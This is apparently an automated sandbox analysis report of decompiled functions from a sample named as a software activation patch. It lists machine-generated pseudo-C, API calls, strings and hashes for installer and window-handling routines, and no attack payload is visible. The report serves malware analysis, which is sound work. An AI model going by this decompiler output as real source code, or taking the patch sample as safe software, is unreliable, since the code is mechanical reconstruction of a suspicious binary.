													__eflags =  *((intOrPtr*)(__eax + 0x348));
													if( *((intOrPtr*)(__eax + 0x348)) == 0) {
														goto L29;
													} else {
														goto L28;
													}
												}
												goto L46;
										}
									}
									goto L46;
									L31:
								} while (E0046C788(_v8, _v20, _t307) != 0);
								E0046C4D8(_v8, _t244, _v20, _t290, _t291, _t307); // executed
							} else {
								_v36 =  *(_v8 + 0x344);
								_v32 = 0;
								_t248 =  &_v36;
								_t240 =  *0x49f490; // 0x23113e0
								if(E00497C0C(_t240,  &_v36, "NextButtonClick", _t300, _t307, 1, 0, 0) != 0) {
									do {
										goto L20;
										L41:
										E0046C4D8(_v8, _t244, _v20, _t290, _t291, _t307);
										_t217 =  *0x49f0f4; // 0x31f3828
										_t218 = E00485444(_t217, _t244, _t248, _t290, _t291, __eflags, _t307);
										__eflags = _t218;
									} while (_t218 != 0);
									 *((char*)(_v8 + 0x341)) = 1;
								}
							}
						}
						goto L45;
					} else {
						switch( *((intOrPtr*)(_t131 * 4 +  &M0046D100))) {
							case 0:
								goto L17;
							case 1:
								if( *((char*)( *((intOrPtr*)(_v8 + 0x2a4)) + 0x101)) == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 2:
								__eax = E0046C9CC(__ebx, __ecx, __edi, __esi, __eflags, __fp0, __ebp);
								__eflags = __al;
								if(__eflags == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 3:
								__eax = E0046CB34(__ebx, __edi, __esi, __eflags, __ebp);
								__eflags = __al;
								if(__eflags == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 4:
								__eax = E0046CC7C(__ebx, __ecx, __edx, __edi, __esi, __eflags, __fp0, __ebp);
								__eflags = __al;
								if(__eflags == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 5:
								__eax = E0046CE3C(__ebx, __edi, __esi, __fp0, __ebp);
								__eflags = __al;
								if(__eflags == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 6:
								__eax = E0046D04C(__ebx, __ecx, __edx, __edi, __esi, __eflags, __ebp);
								__eflags = __al;
								if(__eflags == 0) {
									goto L45;
								} else {
									goto L17;
								}
								goto L46;
							case 7:
								__eflags =  *0x49f443;
								if(__eflags != 0) {
									goto L17;
								} else {
									__eax = _v8;
									__eflags =  *((char*)(__eax + 0x37));
									if(__eflags == 0) {
										goto L45;
									} else {
										goto L17;
									}
								}
								goto L46;
						}
					}
				}
				L46:
			}

0x0046d0bc
0x0046d0bc
0x0046d0bc
0x0046d0bc
0x0046d0bd
0x0046d0bf
0x0046d0c2
0x0046d0c3
0x0046d0c4
0x0046d0c7
0x0046d0ca
0x0046d0cd
0x0046d0d2
0x0046d0d3
0x0046d0d8
0x0046d0db
0x0046d0e1
0x0046d0ea
0x0046d583
0x0046d585
0x0046d588
0x0046d58b
0x0046d593
0x0046d5a0
0x0046d0f0
0x0046d0f3
0x0046d1af
0x0046d1af
0x0046d1bf
0x0046d1c7
0x0046d1c9
0x0046d1d0
0x0046d1d6
0x0046d1dd
0x0046d20f
0x0046d218
0x0046d226
0x0046d229
0x0046d22c
0x0046d232
0x0046d34a
0x0046d34a
0x0046d361
0x0046d36a
0x0046d372
0x0046d375
0x0046d385
0x0046d38a
0x0046d38f
0x0046d390
0x0046d395
0x0046d398
0x0046d3a7
0x0046d3af
0x0046d3b4
0x0046d3c5
0x0046d3cd
0x0046d3d2
0x0046d3db
0x0046d3e4
0x0046d3f4
0x0046d3f9
0x0046d3fc
0x0046d403
0x0046d455
0x0046d45c
0x0046d517
0x0046d519
0x0046d51c
0x0046d51f
0x0046d527
0x0046d534
0x0046d462
0x0046d46a
0x0046d47a
0x0046d48a
0x0046d48f
0x0046d496
0x0046d498
0x0046d4a1
0x0046d4a6
0x0046d4ab
0x0046d4ab
0x0046d4bb
0x0046d4be
0x0046d4c5
0x0046d4d5
0x0046d4da
0x0046d4de
0x0046d4e5
0x0046d4ec
0x0046d4fa
0x0046d4fc
0x0046d4fe
0x0046d4ff
0x0046d502
0x0046d50f
0x0046d4ee
0x0046d4ee
0x0046d4f3
0x00000000
0x0046d4f3
0x0046d4ec
0x0046d405
0x0046d40e
0x0046d411
0x0046d41f
0x0046d435
0x0046d438
0x0046d446
0x0046d44b
0x00000000
0x0046d44b
0x0046d377
0x0046d378
0x00000000
0x00000000
0x00000000
0x00000000
0x0046d378
0x0046d238
0x0046d23e
0x00000000
0x00000000
0x00000000
0x0046d26f
0x0046d27c
0x0046d28d
0x0046d29a
0x0046d2ab
0x0046d2b8
0x00000000
0x00000000
0x0046d2c2
0x0046d2c5
0x0046d2ce
0x0046d2d3
0x0046d2d6
0x0046d2d9
0x0046d2de
0x0046d2e1
0x0046d2e6
0x00000000
0x00000000
0x0046d2ed
0x0046d2f0
0x0046d2f9
0x0046d2fe
0x0046d301
0x0046d304
0x0046d309
0x0046d30c
0x0046d311
0x00000000
0x00000000
0x0046d318
0x0046d31c
0x0046d32a
0x0046d32a
0x0046d32d
0x0046d334
0x0046d338
0x0046d33b
0x0046d340
0x00000000
0x0046d31e
0x0046d31e
0x0046d321
0x0046d328
0x00000000
0x00000000
0x00000000
0x00000000
0x0046d328
0x00000000
0x00000000
0x0046d23e
0x00000000
0x0046d37e
0x0046d570
0x0046d57e
0x0046d1df
0x0046d1ee
0x0046d1f1
0x0046d1f5
0x0046d1fd
0x0046d209
0x0046d20f
0x00000000
0x0046d53c
0x0046d542
0x0046d547
0x0046d54c
0x0046d551
0x0046d551
0x0046d55c
0x0046d55c
0x0046d209
0x0046d1dd
0x00000000
0x0046d0f9
0x0046d0f9
0x00000000
0x00000000
0x00000000
0x0046d13c
0x00000000
0x0046d142
0x00000000
0x0046d142
0x00000000
0x00000000
0x0046d145
0x0046d14b
0x0046d14d
0x00000000
0x0046d153
0x00000000
0x0046d153
0x00000000
0x00000000
0x0046d156
0x0046d15c
0x0046d15e
0x00000000
0x0046d164
0x00000000
0x0046d164
0x00000000
0x00000000
0x0046d167
0x0046d16d
0x0046d16f
0x00000000
0x0046d175
0x00000000
0x0046d175
0x00000000
0x00000000
0x0046d178
0x0046d17e
0x0046d180
0x00000000
0x0046d186
0x00000000
0x0046d186
0x00000000
0x00000000
0x0046d189
0x0046d18f
0x0046d191
0x00000000
0x0046d197
0x00000000
0x0046d197
0x00000000
0x00000000
0x0046d199
0x0046d1a0
0x00000000
0x0046d1a2
0x0046d1a2
0x0046d1a5
0x0046d1a9
0x00000000
0x00000000
0x00000000
0x00000000
0x0046d1a9
0x00000000
0x00000000
0x0046d0f9
0x0046d0f3
0x00000000

Strings

PrepareToInstall failed: %s, xrefs: 0046D41A
Need to restart Windows? %s, xrefs: 0046D441
NextButtonClick, xrefs: 0046D1F8

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
API String ID: 0-2329492092
Opcode ID: cd3336918d838e45288292c04780a9dea09e277d8903bf04548a48ec63614d14
Instruction ID: 44988f13848ffd89d71039ac62f11851b9b9fcebd064a36e5433384ef0c4aa5d
Opcode Fuzzy Hash: cd3336918d838e45288292c04780a9dea09e277d8903bf04548a48ec63614d14
Instruction Fuzzy Hash: 4ED13E34E00109DFDB00EF99C585AEE77F5AB49308F6444B6E804AB352E778AE45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00450424 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59
libraryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00450424(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t34;
				intOrPtr _t40;
				intOrPtr _t50;

				_push(0);
				_push(0);
				_push(_t50);
				_push(0x4504fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				if( *0x49c9e0 == 0) {
					 *0x49e828 = 0;
					if( *0x49e828 == 0) {
						 *0x49e82c = 2;
						E004503F4( &_v12);
						E0042C88C(_v12,  &_v8);
						E0040357C( &_v8, "RICHED20.DLL");
						_t34 = LoadLibraryA(E00403738(_v8)); // executed
						 *0x49e828 = _t34;
					}
					if( *0x49e828 == 0) {
						 *0x49e82c = 1;
						E004503F4( &_v12);
						E0042C88C(_v12,  &_v8);
						E0040357C( &_v8, "RICHED32.DLL");
						 *0x49e828 = LoadLibraryA(E00403738(_v8));
					}
				}
				 *0x49c9e0 =  *0x49c9e0 + 1;
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(0x450504);
				return E00403420( &_v12, 2);
			}

0x00450427
0x00450429
0x00450430
0x00450431
0x00450436
0x00450439
0x00450443
0x0045044b
0x00450457
0x00450459
0x00450466
0x00450471
0x0045047e
0x0045048c
0x00450491
0x00450491
0x0045049d
0x0045049f
0x004504ac
0x004504b7
0x004504c4
0x004504d7
0x004504d7
0x0045049d
0x004504dc
0x004504e4
0x004504e7
0x004504ea
0x004504fc

APIs

LoadLibraryA.KERNEL32(00000000,00000000,004504FD,?,?,?,?,00000000,00000000), ref: 0045048C
LoadLibraryA.KERNEL32(00000000,00000000,004504FD,?,?,?,?,00000000,00000000), ref: 004504D2

Part of subcall function 004503F4: GetSystemDirectoryA.KERNEL32 ref: 0045040C

Strings

RICHED32.DLL, xrefs: 004504BF
RICHED20.DLL, xrefs: 00450479

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: LibraryLoad$DirectorySystem
String ID: RICHED20.DLL$RICHED32.DLL
API String ID: 2630572097-740611112
Opcode ID: 6f68eeb65eba81d6ac66c3940e4fbe5edb9d04ecbac620b0ea9682543601a27d
Instruction ID: 4d2f5d6df61b0d0ac72fc53e5f3b8721577eb5fe8aac3b6587ce23d73eaa98fa
Opcode Fuzzy Hash: 6f68eeb65eba81d6ac66c3940e4fbe5edb9d04ecbac620b0ea9682543601a27d
Instruction Fuzzy Hash: 4F212174500248FFDB00FFA2D886B5E77F8EB5435AF504477E800A7662D7786A498E5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042F1C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0042F1C8(long __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				long _t35;
				intOrPtr _t38;

				_push(0);
				_push(0);
				_push(__ebx);
				_t35 = __eax;
				_push(_t38);
				_push(0x42f262);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				if( *0x49e674 == 0) {
					E0042DD54( &_v12);
					E0042C88C(_v12,  &_v8);
					E0040357C( &_v8, "shlwapi.dll");
					_t20 = E0042E824(_v8, __ebx, 0x8000); // executed
					_t23 = _t20;
					if(_t23 != 0) {
						 *0x49e678 = GetProcAddress(_t23, "SHAutoComplete");
					}
					 *0x49e674 = 1;
				}
				if( *0x49e678 != 0) {
					SHAutoComplete(_t35, 1); // executed
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0042F269);
				return E00403420( &_v12, 2);
			}

0x0042f1cb
0x0042f1cd
0x0042f1cf
0x0042f1d2
0x0042f1d6
0x0042f1d7
0x0042f1dc
0x0042f1df
0x0042f1e9
0x0042f1ee
0x0042f1f9
0x0042f206
0x0042f213
0x0042f218
0x0042f21c
0x0042f229
0x0042f229
0x0042f22e
0x0042f22e
0x0042f23c
0x0042f241
0x0042f241
0x0042f249
0x0042f24c
0x0042f24f
0x0042f261

APIs

SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042F241

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Part of subcall function 0042E824: SetErrorMode.KERNEL32(00008000), ref: 0042E82E
Part of subcall function 0042E824: LoadLibraryA.KERNEL32(00000000,00000000,0042E878,?,00000000,0042E896,?,00008000), ref: 0042E85D

GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042F224

Strings

SHAutoComplete, xrefs: 0042F21E
shlwapi.dll, xrefs: 0042F201

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 395431579-1506664499
Opcode ID: 10e85ac42e3d5d72963f54dd94e2667e767766e27aca82d6749a6d4de36c3baa
Instruction ID: 6fa00d493cbbc8796123fe1d0635de5045be30c1a8ceda1a87749c26dfdb7117
Opcode Fuzzy Hash: 10e85ac42e3d5d72963f54dd94e2667e767766e27aca82d6749a6d4de36c3baa
Instruction Fuzzy Hash: 6501C434700758FBE711DB62EC42B5A7AF8DB56704FD000B7B00062691C6BA9D48862D

Uniqueness

Uniqueness Score: -1.00%

Function 00421704 Relevance: 6.1, APIs: 4, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421704(void* __eax, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t42;
				struct HMENU__* _t51;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				void* _t67;
				void* _t82;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				intOrPtr* _t88;

				_t88 = _t87 + 0xfffffff8;
				_t83 = __edx;
				_t67 = __eax;
				if(__edx == 0) {
					L7:
					_t23 =  *((intOrPtr*)(_t67 + 0x124));
					if( *((intOrPtr*)(_t67 + 0x124)) != 0) {
						E00412960(_t23, 0);
					}
					 *((intOrPtr*)(_t67 + 0x124)) = _t83;
					if(_t83 != 0) {
						E00410578(_t83, _t67);
					}
					if(_t83 == 0 || ( *(_t67 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t67 + 0x111)) == 3) {
						if(E00418808(_t67) != 0) {
							SetMenu(E00418670(_t67), 0); // executed
						}
						goto L26;
					} else {
						if( *((char*)( *((intOrPtr*)(_t67 + 0x124)) + 0x34)) != 0 ||  *((char*)(_t67 + 0x116)) == 1) {
							if(( *(_t67 + 0x1c) & 0x00000010) == 0) {
								if( *((char*)(_t67 + 0x116)) != 1 && E00418808(_t67) != 0) {
									SetMenu(E00418670(_t67), 0);
								}
								goto L26;
							}
							goto L17;
						} else {
							L17:
							if(E00418808(_t67) != 0) {
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
								if(_t42 != GetMenu(E00418670(_t67))) {
									_t51 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
									SetMenu(E00418670(_t67), _t51);
								}
								E00412960(_t83, E00418670(_t67));
							}
							L26:
							if( *((char*)(_t67 + 0x115)) != 0) {
								E004222BC(_t67, 0xf0c0, 1);
							}
							return E0042164C(_t67);
						}
					}
				}
				_t58 =  *0x49e630; // 0x2250660
				_t85 = E0042364C(_t58) - 1;
				if(_t85 >= 0) {
					_t86 = _t85 + 1;
					_t82 = 0;
					do {
						_t60 =  *0x49e630; // 0x2250660
						if(_t83 ==  *((intOrPtr*)(E00423640(_t60) + 0x124))) {
							_t62 =  *0x49e630; // 0x2250660
							if(_t67 != E00423640(_t62)) {
								 *_t88 =  *((intOrPtr*)(_t83 + 8));
								 *((char*)(_t88 + 4)) = 0xb;
								E004091BC(_t67, 0xf0c0, 1, _t82, _t83, 0, _t88);
								E0040311C();
							}
						}
						_t82 = _t82 + 1;
						_t86 = _t86 - 1;
					} while (_t86 != 0);
				}
			}

0x00421708
0x0042170b
0x0042170d
0x00421711
0x00421773
0x00421773
0x0042177b
0x0042177f
0x0042177f
0x00421784
0x0042178c
0x00421792
0x00421792
0x00421799
0x00421853
0x0042185f
0x0042185f
0x00000000
0x004217b2
0x004217bc
0x004217cb
0x0042182c
0x00421843
0x00421843
0x00000000
0x0042182c
0x00000000
0x004217cd
0x004217cd
0x004217d6
0x004217e4
0x004217f8
0x00421802
0x0042180e
0x0042180e
0x0042181e
0x0042181e
0x00421864
0x0042186b
0x00421871
0x00421871
0x00421883
0x00421883
0x004217bc
0x00421799
0x00421713
0x0042171f
0x00421722
0x00421724
0x00421725
0x00421727
0x00421729
0x00421739
0x0042173d
0x00421749
0x0042174e
0x00421751
0x00421765
0x0042176a
0x0042176a
0x00421749
0x0042176f
0x00421770
0x00421770
0x00421727

APIs

GetMenu.USER32(00000000), ref: 004217F1
SetMenu.USER32(00000000,00000000), ref: 0042180E
SetMenu.USER32(00000000,00000000), ref: 00421843
SetMenu.USER32(00000000,00000000), ref: 0042185F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 4f4a6720c0d4240df17a752d101e3e079c79ea095c8752a38fea6d697220fe84
Instruction ID: cda4d875d1f608ccb0f244f9e48059a425efb766f93e731c33a2d40a56ce0a72
Opcode Fuzzy Hash: 4f4a6720c0d4240df17a752d101e3e079c79ea095c8752a38fea6d697220fe84
Instruction Fuzzy Hash: 4641B230B002604BDB20BE3A98857DB36959FA1708F48047FB8408F3A7CA7DCC8587AD

Uniqueness

Uniqueness Score: -1.00%

Function 00416FD2 Relevance: 6.1, APIs: 4, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416FD2(void* __eax, int* __edx) {
				void* _t21;
				long _t23;
				long _t37;
				long _t42;
				int _t47;
				struct HWND__* _t50;

				_t49 = __edx;
				_t43 = __eax;
				_t50 =  *(__eax + 0xc0);
				if(_t50 == 0) {
					return E004157AC(__eax, __edx);
				}
				_t47 =  *__edx;
				_t21 = _t47 + 0xfffffece - 7;
				if(_t21 < 0) {
					_t23 = SendMessageA(__edx[2], _t47 + 0xbc00, __edx[1], __edx[2]);
					 *(_t49 + 0xc) = _t23;
					return _t23;
				}
				if(_t21 + 0xffff4407 - 7 < 0) {
					SetTextColor(__edx[1], E0041A4E8( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x44)) + 0x10))));
					SetBkColor(__edx[1], E0041A4E8(E0041AB34( *((intOrPtr*)(_t43 + 0xbc)))));
					_t37 = E0041AB70( *((intOrPtr*)(_t43 + 0xbc)));
					 *(_t49 + 0xc) = _t37;
					return _t37;
				}
				_t42 = CallWindowProcA( *(__eax + 0xac), _t50,  *__edx, __edx[1], __edx[2]); // executed
				 *(_t49 + 0xc) = _t42;
				return _t42;
			}

0x00416fd8
0x00416fda
0x00416fdc
0x00416fe4
0x00000000
0x0041707e
0x00416fea
0x00416ff3
0x00416ff6
0x00417014
0x00417019
0x00000000
0x00417019
0x00417000
0x0041702e
0x00417048
0x00417053
0x00417058
0x00000000
0x00417058
0x00417070
0x00417075
0x00000000

APIs

SendMessageA.USER32 ref: 00417014
SetTextColor.GDI32(?,00000000), ref: 0041702E
SetBkColor.GDI32(?,00000000), ref: 00417048
CallWindowProcA.USER32 ref: 00417070

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: 9e3e2694ee45dac8d31a23f67f82d5f08d8b2d5533639d352c95bf2745043790
Instruction ID: 80572e548b46958a0d24f1498dfa195ce4484893cdd9813db9ff7b95e026d91f
Opcode Fuzzy Hash: 9e3e2694ee45dac8d31a23f67f82d5f08d8b2d5533639d352c95bf2745043790
Instruction Fuzzy Hash: A71151B5604700AFD710EE6ECD84E8B77EDDF49310B14882BB599DB612C62CEC418B79

Uniqueness

Uniqueness Score: -1.00%

Function 00423558 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00423558(char __edx) {
				char _v5;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t25;
				void* _t26;
				char _t27;
				struct HDC__* _t32;
				void* _t33;
				void* _t34;

				_t27 = __edx;
				if(__edx != 0) {
					_t34 = _t34 + 0xfffffff0;
					_t8 = E00402D30(_t8, _t33);
				}
				_v5 = _t27;
				_t25 = _t8;
				E004104C0(_t26, 0);
				E004236CC(_t25);
				 *(_t25 + 0x20) = E00402B30(1);
				 *((intOrPtr*)(_t25 + 0x2c)) = E00402B30(1);
				 *((intOrPtr*)(_t25 + 0x30)) = E00402B30(1);
				_t32 = GetDC(0);
				_t5 = _t25 + 0x20; // 0x4108f0
				EnumFontsA(_t32, 0, E004234F8,  *_t5); // executed
				 *((intOrPtr*)(_t25 + 0x24)) = GetDeviceCaps(_t32, 0x5a);
				ReleaseDC(0, _t32);
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t25;
			}

0x00423558
0x00423560
0x00423562
0x00423565
0x00423565
0x0042356a
0x0042356d
0x00423573
0x0042357a
0x0042358b
0x0042359a
0x004235a9
0x004235b3
0x004235b5
0x004235c1
0x004235ce
0x004235d4
0x004235dd
0x004235df
0x004235e6
0x004235ef

APIs

GetDC.USER32(00000000), ref: 004235AE
EnumFontsA.GDI32(00000000,00000000,004234F8,004108F0,00000000,?,?,00000000,?,00419463,00000000,?,?,00000001,00000000), ref: 004235C1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004235C9
ReleaseDC.USER32 ref: 004235D4

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CapsDeviceEnumFontsRelease
String ID:
API String ID: 2698912916-0
Opcode ID: e97f28f260114bd4b50ee825155fd8757a5a43882207122cecfc92cdae6cf7ce
Instruction ID: e37963186075478de4bf5b94465d182e7684c730ebf482ac601e72b604436184
Opcode Fuzzy Hash: e97f28f260114bd4b50ee825155fd8757a5a43882207122cecfc92cdae6cf7ce
Instruction Fuzzy Hash: B301D2A17043006AE700BF795D82B9B37649F00309F04467BF808AF3C2D67E9805476E

Uniqueness

Uniqueness Score: -1.00%

Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406284(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2); // executed
				_t4 = GlobalReAlloc(_t2, __edx, __ecx); // executed
				GlobalFix(_t4);
				return _t4;
			}

0x00406287
0x0040628e
0x00406293
0x00406299
0x0040629e

APIs

GlobalHandle.KERNEL32 ref: 00406287
GlobalUnWire.KERNEL32(00000000), ref: 0040628E
GlobalReAlloc.KERNEL32 ref: 00406293
GlobalFix.KERNEL32 ref: 00406299

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: a3b8d3293011eaaa35143cb505ff432a4562d86b91654664e64843e7403df00d
Instruction ID: 024a49765fc045a09389489d8ed5919b86daafa6bea6a005e9f609907830066e
Opcode Fuzzy Hash: a3b8d3293011eaaa35143cb505ff432a4562d86b91654664e64843e7403df00d
Instruction Fuzzy Hash: 64B009C6925A46B8EC0473B24C4BD3F041CE88472C3809A6E7554BA0839C7C9C002E3A

Uniqueness

Uniqueness Score: -1.00%

Function 0049BA2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 76%

			_entry_(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr _t55;
				intOrPtr _t62;
				void* _t65;
				void* _t66;
				void* _t73;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t87;

				_t88 = __eflags;
				_t76 = __edx;
				_t66 = __ecx;
				E00403344();
				E004056A0(_t65, _t84, _t85, __eflags); // executed
				_t8 = E004063FC(_t65, _t66, _t76, _t84, _t85); // executed
				E00406854(_t8); // executed
				E00409DDC(_t65, _t66, _t76, _t84, _t85, _t88); // executed
				E00410BF4();
				E00410E5C();
				E00412DB8(_t65, _t84, _t85, _t88);
				E004253D0(E004194D0());
				E0042FBE8();
				E00430ED4(_t66);
				E0044FDB0(_t65, _t66, _t76, _t84, _t85);
				E0045027C();
				E00450BEC();
				E00451FD0(_t65, _t84, _t85); // executed
				E004539C8(_t65, _t66, _t76, _t84, _t85); // executed
				E004578E4(_t65, _t66, _t76, _t84, _t85, _t88); // executed
				E00458848(_t65, _t76, _t84, _t85);
				E00459B60(_t65, _t84, _t85);
				E00465A14(_t65, _t66, _t76, _t84, _t85, _t88); // executed
				E0046E39C(_t65, _t66, _t76, _t84, _t85, _t88); // executed
